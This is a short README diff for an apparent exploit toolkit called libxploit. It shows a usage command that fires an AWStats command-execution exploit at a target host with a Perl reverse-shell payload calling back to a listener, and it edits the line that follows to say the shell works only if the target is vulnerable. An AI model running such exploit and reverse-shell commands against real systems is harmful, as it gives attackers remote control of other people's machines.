kostyll/libxploit/README.md

     $ ./pick --exploit exec-awstats --payload cmd-reverse-perl --exploit-opts RHOST=192.168.1.2,RPORT=80 --payload-opts LHOST=192.168.1.1,LPORT=4444

-Get back to terminal with your connection handler and enjoy interactive remote shell session.
+Get back to terminal with your connection handler and (if target machine is vulnerable) enjoy interactive remote shell session.